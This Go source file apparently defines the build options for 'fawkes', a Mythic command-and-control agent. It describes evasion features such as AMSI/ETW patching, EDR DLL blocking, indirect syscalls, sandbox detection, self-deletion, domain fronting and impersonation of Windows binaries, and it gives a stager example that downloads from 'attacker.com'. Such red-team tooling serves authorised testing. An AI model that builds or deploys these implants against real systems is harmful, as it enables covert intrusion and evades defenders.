package agentfunctions

import (
	agentstructs "github.com/MythicMeta/MythicContainer/agent_structs"
)

var payloadDefinition = agentstructs.PayloadType{
	Name:                                   "fawkes",
	FileExtension:                          "bin",
	Author:                                 "@galoryber",
	SupportedOS:                            []string{agentstructs.SUPPORTED_OS_WINDOWS, agentstructs.SUPPORTED_OS_LINUX, agentstructs.SUPPORTED_OS_MACOS},
	Wrapper:                                false,
	CanBeWrappedByTheFollowingPayloadTypes: []string{},
	SupportsDynamicLoading:                 false,
	Description:                            "fawkes agent",
	SupportedC2Profiles:                    []string{"http", "tcp", "discord", "httpx"},
	MythicEncryptsData:                     true,
	MessageFormat:                          agentstructs.MessageFormatJSON,
	BuildParameters: []agentstructs.BuildParameter{
		{
			Name:          "mode",
			Description:   "Choose the build mode option. Select default for executables, shared for a .dll or .so file,  shellcode to use sRDI to convert the DLL to windows shellcode",
			Required:      false,
			DefaultValue:  "default-executable",
			Choices:       []string{"default-executable", "shared", "windows-shellcode", "windows-ps-stager"},
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_CHOOSE_ONE,
		},
		{
			Name:          "architecture",
			Description:   "Choose the agent's architecture",
			Required:      false,
			DefaultValue:  "amd64",
			Choices:       []string{"amd64", "386", "arm", "arm64", "mips", "mips64"},
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_CHOOSE_ONE,
		},
		{
			Name:          "garble",
			Description:   "Use Garble to obfuscate the output Go executable.\nWARNING - This significantly slows the agent build time.",
			Required:      false,
			DefaultValue:  false,
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_BOOLEAN,
		},
		{
			Name:          "inflate_bytes",
			Description:   "Optional: Hex bytes to inflate binary with (e.g. 0x90 or 0x41,0x42). Used with inflate_count to lower entropy or increase file size.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "inflate_count",
			Description:   "Optional: Number of times to repeat the inflate bytes (e.g. 3000 = 3000 repetitions of the byte pattern).",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "host_header",
			Description:   "Optional: Override the Host header in HTTP requests. Used for domain fronting — set this to the real C2 domain while callback_host points to the CDN edge.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "proxy_url",
			Description:   "Optional: Route agent traffic through an HTTP/SOCKS proxy (e.g. http://proxy:8080 or socks5://127.0.0.1:1080).",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "proxy_user",
			Description:   "Optional: Proxy authentication username (Basic auth). Used when the proxy requires credentials. Can also embed creds in proxy_url (http://user:pass@proxy:8080).",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "proxy_pass",
			Description:   "Optional: Proxy authentication password (Basic auth). Used with proxy_user when the proxy requires credentials.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "fallback_hosts",
			Description:   "Optional: Comma-separated fallback C2 callback hosts for automatic failover. If the primary callback_host is unreachable, the agent cycles through these. Same port and encryption as primary. E.g. 'http://backup1.example.com,https://backup2.example.com'.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "tls_verify",
			Description:   "TLS certificate verification mode. 'none' = skip verification (default). 'system-ca' = use OS trust store. 'pinned:<sha256hex>' = pin to specific certificate fingerprint (e.g. pinned:a1b2c3...).",
			Required:      false,
			DefaultValue:  "none",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "tls_fingerprint",
			Description:   "TLS ClientHello fingerprint to mimic. Spoofs the JA3/JA3S hash to match a real browser. 'go' = default Go TLS stack (no spoofing). 'chrome' = Chrome/Chromium. 'firefox' = Firefox. 'safari' = Safari. 'edge' = Edge. 'random' = randomized fingerprint.",
			Required:      false,
			DefaultValue:  "chrome",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_CHOOSE_ONE,
			Choices:       []string{"chrome", "firefox", "safari", "edge", "random", "go"},
		},
		{
			Name:          "working_hours_start",
			Description:   "Optional: Working hours start time in HH:MM 24-hour format (e.g. '09:00'). Agent only calls back during working hours. Leave empty for always-active.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "working_hours_end",
			Description:   "Optional: Working hours end time in HH:MM 24-hour format (e.g. '17:00'). Agent only calls back during working hours. Leave empty for always-active.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "working_days",
			Description:   "Optional: Comma-separated ISO weekday numbers when agent is active (Mon=1, Sun=7). E.g. '1,2,3,4,5' for weekdays only. Leave empty for all days.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "tcp_bind_address",
			Description:   "Optional: TCP P2P bind address (e.g. '0.0.0.0:7777'). When set, the agent operates in TCP P2P mode — it listens for a parent agent connection instead of using HTTP. Leave empty for HTTP egress mode.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "namedpipe_bind_name",
			Description:   "Optional: Named pipe P2P name (e.g. 'msrpc-f9a1'). Windows only. When set, the agent listens on a named pipe for parent connections via SMB (port 445). Stealthier than TCP — blends with normal Windows traffic. Leave empty to use TCP.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "env_key_hostname",
			Description:   "Optional: Environment key — regex pattern the hostname must match (e.g. '.*\\.contoso\\.com' or 'WORKSTATION-\\d+'). Agent exits silently before checkin if hostname doesn't match. Leave empty to skip.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "env_key_domain",
			Description:   "Optional: Environment key — regex pattern the domain must match (e.g. 'CONTOSO' or '.*\\.local'). Agent exits silently before checkin if domain doesn't match. Leave empty to skip.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "env_key_username",
			Description:   "Optional: Environment key — regex pattern the current username must match (e.g. 'admin.*' or 'svc_.*'). Agent exits silently before checkin if username doesn't match. Leave empty to skip.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "env_key_process",
			Description:   "Optional: Environment key — process name that must be running on the system (e.g. 'outlook.exe' or 'slack'). Agent exits silently before checkin if process not found. Leave empty to skip.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "self_delete",
			Description:   "Delete the agent binary from disk after execution starts. Reduces forensic artifacts. On Linux/macOS, the file is removed immediately (process continues from memory). On Windows, uses NTFS stream rename technique.",
			Required:      false,
			DefaultValue:  false,
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_BOOLEAN,
		},
		{
			Name:          "masquerade_name",
			Description:   "Optional: Masquerade the agent process name on Linux. Changes /proc/self/comm (visible in ps, top, htop). Max 15 chars. Examples: '[kworker/0:1]', 'sshd', 'apache2', '[migration/0]'. Leave empty to skip.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "auto_patch",
			Description:   "Automatically patch ETW (EtwEventWrite) and AMSI (AmsiScanBuffer) at agent startup. Prevents ETW-based detection and AMSI scanning before any agent activity. Windows only — no-op on Linux/macOS.",
			Required:      false,
			DefaultValue:  false,
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_BOOLEAN,
		},
		{
			Name:          "obfuscate_strings",
			Description:   "XOR-encode C2 config strings (callback host, URIs, user agent, encryption key, UUID) at build time. Prevents trivial IOC extraction via 'strings' on the binary. Decoded at runtime with a per-build random key.",
			Required:      false,
			DefaultValue:  false,
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_BOOLEAN,
		},
		{
			Name:          "block_dlls",
			Description:   "Block non-Microsoft DLLs from being loaded in child processes spawned by the agent (run, powershell). Prevents EDR from injecting monitoring DLLs. Windows only — no-op on Linux/macOS.",
			Required:      false,
			DefaultValue:  false,
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_BOOLEAN,
		},
		{
			Name:          "indirect_syscalls",
			Description:   "Enable indirect syscalls at startup. Resolves Nt* syscall numbers from ntdll export table and generates stubs that jump to ntdll's syscall;ret gadget. Injection commands will use indirect syscalls to bypass userland API hooks. Windows only — no-op on Linux/macOS.",
			Required:      false,
			DefaultValue:  false,
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_BOOLEAN,
		},
		{
			Name:          "sandbox_guard",
			Description:   "Detect sandbox time-acceleration (sleep skipping). If the agent's sleep is fast-forwarded by a sandbox, it exits silently. Prevents execution in automated analysis environments.",
			Required:      false,
			DefaultValue:  false,
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_BOOLEAN,
		},
		{
			Name:          "dll_exports",
			Description:   "DLL export set (shared/shellcode mode only). 'standard' = Run, Fire, VoidFunc. 'full' adds DllRegisterServer (regsvr32 T1218.010), DllUnregisterServer, ServiceMain (svchost DLL service), DllGetClassObject + DllCanUnloadNow (COM hijack T1546.015).",
			Required:      false,
			DefaultValue:  "standard",
			Choices:       []string{"standard", "full"},
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_CHOOSE_ONE,
		},
		{
			Name:          "content_types",
			Description:   "Comma-separated Content-Type values to cycle through for HTTP POST requests. The agent rotates through the list round-robin. Empty uses default (application/x-www-form-urlencoded). Example: 'application/json,text/plain,application/x-www-form-urlencoded'. URI paths support randomization tokens: {rand:N} for N hex chars, {int:M-N} for random integer in range.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		// body_transforms removed: agent-side transforms without matching C2 server
		// support silently corrupt traffic. Use httpx C2 profile for malleable transforms.
		{
			Name:          "sleep_mask",
			Description:   "Encrypt sensitive agent and C2 data in memory during sleep cycles. Uses AES-256-GCM with a random per-cycle key. Process memory dumps during sleep only reveal encrypted blobs — not C2 URLs, encryption keys, or UUIDs. C2 profile fields are only masked when no tasks are actively running.",
			Required:      false,
			DefaultValue:  false,
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_BOOLEAN,
		},
		{
			Name:          "sleep_guard_pages",
			Description:   "Protect sleep vault memory with PAGE_NOACCESS during sleep. After encrypting sensitive data, vault pages are VirtualProtect'd to NO_ACCESS — EDR memory scanners get STATUS_ACCESS_VIOLATION when scanning agent memory during sleep. Requires sleep_mask=true. Windows only.",
			Required:      false,
			DefaultValue:  false,
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_BOOLEAN,
		},
		{
			Name:          "user_agent_pool",
			Description:   "Optional: Newline-separated list of User-Agent strings. When set, the agent rotates through the pool per-request instead of using a single static User-Agent. Reduces network fingerprinting. Leave empty to use the default Chrome UA.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "kill_date",
			Description:   "Optional: UTC date/time after which the agent will self-terminate (format: YYYY-MM-DD or YYYY-MM-DD HH:MM). Leave empty for no kill date. Enforced every tasking cycle.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "stager_url",
			Description:   "PowerShell stager: URL to download the full payload from (e.g., https://attacker.com/payload.exe). The stager will download from this URL and execute. Only used with windows-ps-stager mode.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "stager_amsi_bypass",
			Description:   "PowerShell stager: Include AMSI bypass in the stager script. Patches AmsiScanBuffer before downloading the payload to prevent detection of the download cradle.",
			Required:      false,
			DefaultValue:  true,
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_BOOLEAN,
		},
		{
			Name:          "http_timeout",
			Description:   "HTTP request timeout in seconds. Controls how long the agent waits for C2 server responses. Default: 30. Increase for high-latency networks, decrease for faster failure detection.",
			Required:      false,
			DefaultValue:  "30",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "max_retries",
			Description:   "Maximum number of consecutive failed checkin attempts before the agent self-terminates. Default: 10. Set to 0 for unlimited retries.",
			Required:      false,
			DefaultValue:  "10",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "recovery_interval",
			Description:   "Seconds between recovery attempts for unhealthy C2 domains. When a domain fails repeatedly, it is marked unhealthy and skipped. After this interval, the agent retries it. Default: 600 (10 minutes). Only relevant when using multiple domains/fallback hosts.",
			Required:      false,
			DefaultValue:  "600",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "pe_preset",
			Description:   "Windows PE metadata preset — impersonate a legitimate Windows binary's version info (visible in File Properties > Details and Task Manager). Individual pe_* fields override preset values. Windows only — ignored for Linux/macOS.",
			Required:      false,
			DefaultValue:  "none",
			Choices:       []string{"none", "notepad", "svchost", "cmd", "explorer", "msiexec", "dllhost", "rundll32", "conhost", "taskhostw", "RuntimeBroker"},
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_CHOOSE_ONE,
		},
		{
			Name:          "pe_company",
			Description:   "Optional: CompanyName in PE version info (e.g. 'Microsoft Corporation'). Visible in File Properties > Details. Overrides preset. Windows only.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "pe_description",
			Description:   "Optional: FileDescription in PE version info (e.g. 'Windows Notepad'). Visible in File Properties and Task Manager description column. Overrides preset. Windows only.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "pe_product",
			Description:   "Optional: ProductName in PE version info (e.g. 'Microsoft® Windows® Operating System'). Overrides preset. Windows only.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "pe_version",
			Description:   "Optional: File and product version string (e.g. '10.0.19041.1'). Format: Major.Minor.Patch.Build. Visible in File Properties > Details. Overrides preset. Windows only.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "pe_copyright",
			Description:   "Optional: LegalCopyright in PE version info (e.g. '© Microsoft Corporation. All rights reserved.'). Overrides preset. Windows only.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "pe_original_filename",
			Description:   "Optional: OriginalFilename in PE version info (e.g. 'NOTEPAD.EXE'). Visible to forensic tools regardless of actual filename on disk. Overrides preset. Windows only.",
			Required:      false,
			DefaultValue:  "",
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_STRING,
		},
		{
			Name:          "pe_icon",
			Description:   "Optional: Custom icon file (.ico or .png). Displayed in Windows Explorer, taskbar, and Alt-Tab. Upload an icon to visually impersonate a legitimate application. Windows only.",
			Required:      false,
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_FILE,
		},
		{
			Name:          "pe_manifest",
			Description:   "UAC manifest execution level embedded in the PE. Controls Windows elevation prompt behavior. 'asInvoker' = run with caller's token (default, no prompt). 'highestAvailable' = elevate if user is admin. 'requireAdministrator' = always prompt for elevation. Windows only.",
			Required:      false,
			DefaultValue:  "none",
			Choices:       []string{"none", "asInvoker", "highestAvailable", "requireAdministrator"},
			ParameterType: agentstructs.BUILD_PARAMETER_TYPE_CHOOSE_ONE,
		},
	},
	BuildSteps: []agentstructs.BuildStep{
		{
			Name:        "Configuring",
			Description: "Cleaning up configuration values and generating the golang build command",
		},
		{
			Name:        "PE Resources",
			Description: "Embedding Windows PE version info, icon, and manifest",
		},
		{
			Name:        "Compiling",
			Description: "Compiling the golang agent (maybe with obfuscation via garble)",
		},
		{
			Name:        "YARA Scan",
			Description: "Scanning payload against detection rules (informational only)",
		},
		{
			Name:        "Entropy Analysis",
			Description: "Analyzing payload entropy characteristics (informational only)",
		},
		{
			Name:        "Reporting back",
			Description: "Sending the payload back to Mythic",
		},
	},
}
